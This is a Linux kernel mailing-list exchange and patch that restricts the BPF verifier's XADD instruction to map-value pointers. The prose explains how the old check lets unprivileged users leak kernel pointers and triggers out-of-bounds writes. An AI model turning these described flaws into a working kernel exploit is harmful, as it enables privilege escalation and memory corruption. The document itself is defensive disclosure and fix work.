On Thu, Apr 16, 2020 at 6:40 PM Jann Horn <jannh@google.com> wrote: > > On Fri, Apr 17, 2020 at 2:41 AM Alexei Starovoitov > <alexei.starovoitov@gmail.com> wrote: > > On Fri, Apr 17, 2020 at 12:34:42AM +0200, Jann Horn wrote: > > > On Thu, Apr 16, 2020 at 11:11 PM Alexei Starovoitov > > > <alexei.starovoitov@gmail.com> wrote: > > > > On Wed, Apr 15, 2020 at 10:47:43PM +0200, Jann Horn wrote: > > > > > At the moment, check_xadd() uses a blacklist to decide whether a given > > > > > pointer type should be usable with the XADD instruction. Out of all the > > > > > pointer types that check_mem_access() accepts, only four are currently let > > > > > through by check_xadd(): > > > > > > > > > > PTR_TO_MAP_VALUE > > > > > PTR_TO_CTX rejected > > > > > PTR_TO_STACK > > > > > PTR_TO_PACKET rejected > > > > > PTR_TO_PACKET_META rejected > > > > > PTR_TO_FLOW_KEYS rejected > > > > > PTR_TO_SOCKET rejected > > > > > PTR_TO_SOCK_COMMON rejected > > > > > PTR_TO_TCP_SOCK rejected > > > > > PTR_TO_XDP_SOCK rejected > > > > > PTR_TO_TP_BUFFER > > > > > PTR_TO_BTF_ID > > > > > > > > > > Looking at the currently permitted ones: > > > > > > > > > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > > > > > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > > > > > the BPF stack. It also causes confusion further down, because the first > > > > > check_mem_access() won't check whether the stack slot being read from is > > > > > STACK_SPILL and the second check_mem_access() assumes in > > > > > check_stack_write() that the value being written is a normal scalar. > > > > > This means that unprivileged users can leak kernel pointers. > > > > > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > > > > > - PTR_TO_BTF_ID: This is read-only, XADD can't work. 
When the verifier > > > > > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > > > > > invocation gets confused by value_regno not being a valid array index > > > > > and writes to out-of-bounds memory. > > > > > > > > > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > > > > > sense, and is sometimes broken on top of that. > > > > > > > > > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > > > > > Signed-off-by: Jann Horn <jannh@google.com> > > > > > --- > > > > > I'm just sending this on the public list, since the worst-case impact for > > > > > non-root users is leaking kernel pointers to userspace. In a context where > > > > > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > > > > > effective at the moment anyway. > > > > > > > > > > This breaks ten unit tests that assume that XADD is possible on the stack, > > > > > and I'm not sure how all of them should be fixed up; I'd appreciate it if > > > > > someone else could figure out how to fix them. I think some of them might > > > > > be using XADD to cast pointers to numbers, or something like that? But I'm > > > > > not sure. > > > > > > > > > > Or is XADD on the stack actually something you want to support for some > > > > > reason, meaning that that part would have to be fixed differently? > > > > > > > > yeah. 'doesnt make sense' is relative. > > > > I prefer to fix the issues instead of disabling them. > > > > xadd to PTR_TO_STACK, PTR_TO_TP_BUFFER, PTR_TO_BTF_ID should all work > > > > because they are direct pointers to objects. > > > > > > PTR_TO_STACK and PTR_TO_TP_BUFFER I can sort of understand. But > > > PTR_TO_BTF_ID is always readonly, so XADD on PTR_TO_BTF_ID really > > > doesn't make any sense AFAICS. > > > > Not quite. See bpf_tcp_ca_btf_struct_access(). Few fields of one specific > > 'struct tcp_sock' are whitelisted for write. > > Oh... but that kind of thing is not really safe, right? 
While there > aren't really any pointers to struct tcp_sock in the kernel, I've > noticed that there are also some helpers that take ARG_PTR_TO_BTF_ID > arguments, which is kind of similar; and those look like it wouldn't > be hard for root to abuse them to corrupt kernel memory. E.g. > bpf_skb_output_proto is reachable from tracing programs, so I expect > that it'd be pretty easy to corrupt kernel memory with that. > > As far as I can tell, fundamentally, BPF must not write through BTF > pointers because the BPF verifier can't guarantee that BTF pointers > actually point to the type they're supposed to point to. In general case of tracing yes. There is no 100% guarantee that's why there is no write there. But in case of bpf-tcp-cc it's guaranteed to be a valid pointer. Or I'm missing your point.
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 38cfcf701eeb7..397c17a2e970f 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -2699,28 +2699,6 @@ static bool is_ctx_reg(struct bpf_verifier_env *env, int regno)
 	return reg->type == PTR_TO_CTX;
 }
 
-static bool is_sk_reg(struct bpf_verifier_env *env, int regno)
-{
-	const struct bpf_reg_state *reg = reg_state(env, regno);
-
-	return type_is_sk_pointer(reg->type);
-}
-
-static bool is_pkt_reg(struct bpf_verifier_env *env, int regno)
-{
-	const struct bpf_reg_state *reg = reg_state(env, regno);
-
-	return type_is_pkt_pointer(reg->type);
-}
-
-static bool is_flow_key_reg(struct bpf_verifier_env *env, int regno)
-{
-	const struct bpf_reg_state *reg = reg_state(env, regno);
-
-	/* Separate to is_ctx_reg() since we still want to allow BPF_ST here. */
-	return reg->type == PTR_TO_FLOW_KEYS;
-}
-
 static int check_pkt_ptr_alignment(struct bpf_verifier_env *env,
 				   const struct bpf_reg_state *reg,
 				   int off, int size, bool strict)
@@ -3298,10 +3276,7 @@ static int check_xadd(struct bpf_verifier_env *env, int insn_idx, struct bpf_ins
 		return -EACCES;
 	}
 
-	if (is_ctx_reg(env, insn->dst_reg) ||
-	    is_pkt_reg(env, insn->dst_reg) ||
-	    is_flow_key_reg(env, insn->dst_reg) ||
-	    is_sk_reg(env, insn->dst_reg)) {
+	if (reg_state(env, insn->dst_reg)->type != PTR_TO_MAP_VALUE) {
 		verbose(env, "BPF_XADD stores into R%d %s is not allowed\n",
 			insn->dst_reg,
 			reg_type_str[reg_state(env, insn->dst_reg)->type]);
At the moment, check_xadd() uses a blacklist to decide whether a given
pointer type should be usable with the XADD instruction. Out of all the
pointer types that check_mem_access() accepts, only four are currently
let through by check_xadd():

PTR_TO_MAP_VALUE
PTR_TO_CTX          rejected
PTR_TO_STACK
PTR_TO_PACKET       rejected
PTR_TO_PACKET_META  rejected
PTR_TO_FLOW_KEYS    rejected
PTR_TO_SOCKET       rejected
PTR_TO_SOCK_COMMON  rejected
PTR_TO_TCP_SOCK     rejected
PTR_TO_XDP_SOCK     rejected
PTR_TO_TP_BUFFER
PTR_TO_BTF_ID

Looking at the currently permitted ones:

- PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for
  XADD.
- PTR_TO_STACK: This doesn't make much sense, there is no concurrency
  on the BPF stack. It also causes confusion further down, because the
  first check_mem_access() won't check whether the stack slot being
  read from is STACK_SPILL and the second check_mem_access() assumes in
  check_stack_write() that the value being written is a normal scalar.
  This means that unprivileged users can leak kernel pointers.
- PTR_TO_TP_BUFFER: This is a local output buffer without concurrency.
- PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier
  tries to verify XADD on such memory, the first
  check_ptr_to_btf_access() invocation gets confused by value_regno not
  being a valid array index and writes to out-of-bounds memory.

Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't
make sense, and is sometimes broken on top of that.

Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)")
Signed-off-by: Jann Horn <jannh@google.com>
---
I'm just sending this on the public list, since the worst-case impact
for non-root users is leaking kernel pointers to userspace. In a
context where you can reach BPF (no sandboxing), I don't think that
kernel ASLR is very effective at the moment anyway.
This breaks ten unit tests that assume that XADD is possible on the
stack, and I'm not sure how all of them should be fixed up; I'd
appreciate it if someone else could figure out how to fix them. I think
some of them might be using XADD to cast pointers to numbers, or
something like that? But I'm not sure.

Or is XADD on the stack actually something you want to support for some
reason, meaning that that part would have to be fixed differently?

 kernel/bpf/verifier.c | 27 +--------------------------
 1 file changed, 1 insertion(+), 26 deletions(-)

base-commit: 87b0f983f66f23762921129fd35966eddc3f2dae